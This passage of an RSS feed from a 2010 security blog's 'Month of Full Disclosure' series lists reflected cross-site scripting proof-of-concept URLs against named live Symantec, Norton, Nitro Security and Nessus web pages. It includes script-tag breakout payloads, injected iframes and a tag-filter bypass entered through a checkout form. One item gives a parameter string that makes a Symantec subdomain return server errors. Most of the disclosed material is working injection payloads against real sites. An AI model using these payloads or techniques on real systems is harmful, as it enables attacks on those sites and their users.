<p>3E&amp;topic=symantec&amp;strBODY=aaa&amp;submit2=Send</p>
<p>(11)</p>
<p>https://symantecevents.verite.com/?action=event.dsp_cancel&#038;event_id=17895&#038;error=ttm&#8211;&lt;/div&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,</p>
<p>99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;test</p>
<p>(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&amp;ct=us&amp;segment=ttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(&#8216;The Test Manager Xss Test using Sub Finder on Symantec&#8217;)&lt;/script&gt;</p>
<p>(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm&#8211;&#8221;;&lt;/script&gt;&lt;script&gt;alert(&#8216;the test manager xss test of sub finder on Symantec&#8217;)&lt;/script&gt;test&amp; (may need to visit page</p>
<p>twice as the first time sets the cookie)</p>
<p>(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;XSS TEST&#8217;)&lt;/script&gt;&amp;lg=en&amp;noqcode=</p>
<p>(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;The Test Manager Subfinder Xss</p>
<p>Symantec&#8217;)&lt;/script&gt;&amp;PASSWD=a&amp;CONFIRM_PASSWD=a&amp;a_id=48182&amp;s_id=70&amp;p_id=null&amp;COMMAND_DESTINATION_URL=null&amp;REDIRECT_PAGE=null&amp;p_locale=en_US&amp;l_id=&amp;article_title=Results&amp;t_id=62243672&amp;t_s=1283128779469&amp;EMAIL_AS_</p>
<p>USER_FLAG=Y&amp;FRM_ACTION=Create+Account&amp;ru=null</p>
<p>(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E</p>
<p>(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.<br />
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&amp;cmd=sc&amp;courseNo=DP6000&amp;EXValue=null&amp;file=null&amp;module&amp;page=null&amp;siteName=sena&amp;type=g_<br />
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.</p>
<p>(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;The Test Manager XSS Sub Finder Tool Test&#8217;)&lt;/script&gt;&amp;rule=any&amp;page=2</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Full Disclosure &#8211; XSS Issue on Nitro Security Site.</title>
		<link>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 11:59:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=367</guid>
		<description><![CDATA[Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site. This time it is on the site of Nitro Security Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites. The [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="Nitro Security XSS" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="Nitro Security XSS" width="391" height="135" /><p class="wp-caption-text">Nitro Security XSS</p></div>
<p>Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site.</p>
<p>This time it is on the site of <a title="Nitro Security" href="http://nitrosecurity.com" target="_blank">Nitro Security</a></p>
<p>Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites.</p>
<p>The issue on there site has been there for a while and one would have thoguht that the company would have run its own tools against its won site to make sure that all is secure.</p>
<p>Unlike other security sites such as Tennable / Nessus etc on Nitro there is no attempt made to protect the site from user created data injections.</p>
<p>And with that I give you <a title="Nitro Security Xss" href="http://nitrosecurity.com/LOGIN?destination=ttm%22%3E%3C/a%3E%3C/form%3E%3C/script%3E%3Cscript%3Ealert%28%27TheTestManager.com%20Month%20of%20Full%20Disclosure%20Bugs%27%29%3C/script%3E%3Ciframe%20src%20=%22http://www.thetestmanager.com%22%20width=%22800%22%20height=%22800%22%3E%3C/iframe%3E&amp;src=&amp;credential_0=aaa%40aaa.com&amp;registered=yes&amp;credential_1=xxxxx&amp;cmd=Sign+In" target="_blank">Nitro Security XSS Issue. </a></p>
<div class="wp-caption alignnone" style="width: 602px"><img class=" " title="Nitro Security XSS" src="http://www.thetestmanager.com/pics/Blog/Nitro Xss.png" alt="Nitro Security XSS" width="592" height="426" /><p class="wp-caption-text">Nitro Security XSS</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Full Disclosure – Nessus Website Vulnerable to XSS</title>
		<link>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/#comments</comments>
		<pubDate>Wed, 11 Aug 2010 12:38:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=365</guid>
		<description><![CDATA[Nessus is a product owned now by Tenable Network Security. I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="The Test Manager Nessus XSS" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="The Test Manager Nessus XSS" width="391" height="135" /><p class="wp-caption-text">The Test Manager Nessus Cross Site Scripting Error</p></div>
<p>Nessus is a product owned now by <a title="Tenable" href="http://www.nessus.org/nessus/" target="_blank">Tenable Network Security.</a></p>
<p>I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a lot of us  do this for the challenge.</p>
<p>Due to the nature of the security business their sites are usually locked down fairly tight.</p>
<p>However you can still a good few issues here and there.</p>
<p>It would also seem that security sites are just as susceptible to code injections and other types of low hanging fruit.</p>
<p>and with that I give you</p>
<p>Tenable Network Security / Nessus &#8211; All your Base are Belong to Us.</p>
<div class="wp-caption alignnone" style="width: 692px"><img title="Tenable All Your Base" src="http://www.thetestmanager.com/pics/Blog/Nessus All Your Base.png" alt="Nessus All Your Base" width="682" height="768" /><p class="wp-caption-text">Tenable / Nessus All Your Base</p></div>
<p>Bug Details as follows</p>
<p>Well the security isn&#8217;t that bad here, they do block a lot of tags, So this means No Script Tags , No Href tags, No Iframe or Frame Tags, No Img Tags,</p>
<p>So I had to get a little creative and hence you have the popular meme of &#8220;all your base&#8221;</p>
<p>this is done by firstly a Heading Tag which is not blocked and then I&#8217;m allowed to use Div Tags and Object Tags, oh year and I&#8217;m also allowed to close the TextArea Tag.</p>
<p>Once I worked out what I could use I put it all together see below for the injection.</p>
<p>&lt;/TEXTAREA&gt;&lt;div&gt;&lt;h1&gt;The Test Manager Month Of Security Site Bugs&lt;/h1&gt;&lt;object width=&#8221;480&#8243; height=&#8221;385&#8243;&gt;&lt;param name=&#8221;movie&#8221; value=&#8221;http://www.youtube.com/v/8fvTxv46ano&amp;amp;hl=en_GB&amp;amp;fs=1&#8243;&gt;&lt;/param&gt;&lt;param name=&#8221;allowFullScreen&#8221; value=&#8221;true&#8221;&gt;&lt;/param&gt;&lt;param name=&#8221;allowscriptaccess&#8221; value=&#8221;always&#8221;&gt;&lt;/param&gt;&lt;embed src=&#8221;http://www.youtube.com/v/8fvTxv46ano&amp;amp;hl=en_GB&amp;amp;fs=1&#8243; type=&#8221;application/x-shockwave-flash&#8221; allowscriptaccess=&#8221;always&#8221; allowfullscreen=&#8221;true&#8221; width=&#8221;480&#8243; height=&#8221;385&#8243;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;</p>
<p>Now this is just a bit of fun rather than a fully exploitable bug.  The reason is that I could not get it to work from the URL.</p>
<p>To get the XSS to work you firstly need to have an item in your shopping cart and then checkout.</p>
<p>Then once your on the</p>
<p><a title="Nessus Checkout Page" href="https://products.nessus.org/one-page-checkout.asp" target="_blank">https://products.nessus.org/one-page-checkout.asp page</a></p>
<p>there is a payment information box. Just put your code into that box and checkout. No need to fill in the rest of the form boxes the injection works when the form reloads.</p>
<p>Enjoy.</p>
<p>Martin H</p>
<p>The Test Manager.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Full Disclosure &#8211; Symantec Website Vulnerable to XSS</title>
		<link>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 10:55:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=359</guid>
		<description><![CDATA[I saw a post by d3v1l of http://security-sh3ll.blogspot.com/ where he posts a discovery of a cross site scripting issue on the Symantec site. I remembered that I had found a similar issue a while back and hadn&#8217;t got round to disclosing it to them, so I therefore guess its fine to include in the month [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" title="Symantex XSS (Cross Site Scripting)" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="(Cross Site Scripting)" width="391" height="135" />I saw a post by d3v1l of <a title="Security Shell" href="http://security-sh3ll.blogspot.com/" target="_blank">http://security-sh3ll.blogspot.com/</a> where he posts a discovery of a <a title="Security Shell Symantec XSS" href="http://security-sh3ll.blogspot.com/2010/08/symantec-website-still-vulnerable-to.html" target="_blank">cross site scripting issue on the Symantec site</a>.</p>
<p>I remembered that I had found a similar issue a while back and hadn&#8217;t got round to disclosing it to them, so I therefore guess its fine to include in the month of full disclosure.</p>
<p>And with that I give you a<a title="New Symantec XSS bug" href="http://renewals.symantec.com/renewals/application?source_code=ttm%27//--%3E%3C/script%3E%3Cscript%3Ealert(%27TheTestManager.com%20Month%20of%20Full%20Disclosure%20Bugs%27)%3C/script%3E%3Ciframe%20src%20=%22http://www.thetestmanager.com%22%20width=%22100%%22%20height=%22800%22%3E%3C/iframe%3E&amp;entry_point=sym_lrc" target="_blank"> new Symantec XSS bug. </a></p>
<div class="wp-caption alignnone" style="width: 693px"><img class="  " title="Symantec XSS" src="http://www.thetestmanager.com/pics/Blog/Symantec XSS.png" alt="Symantec XSS" width="683" height="400" /><p class="wp-caption-text">Symantec XSS</p></div>
<p>Notes about the bug are as follows.</p>
<p>the issue is caused by Symantec not checking that html comments cannot be ended via user input. So all I had to do was to close the HMTL comment tag and then insert any code I saw fit. In this case a very simple JavaScript Alert box as is the norm with demonstrating XSS bugs and I also added a little Iframe.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/10/full-disclosure-symantec-website-vulnerable-to-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

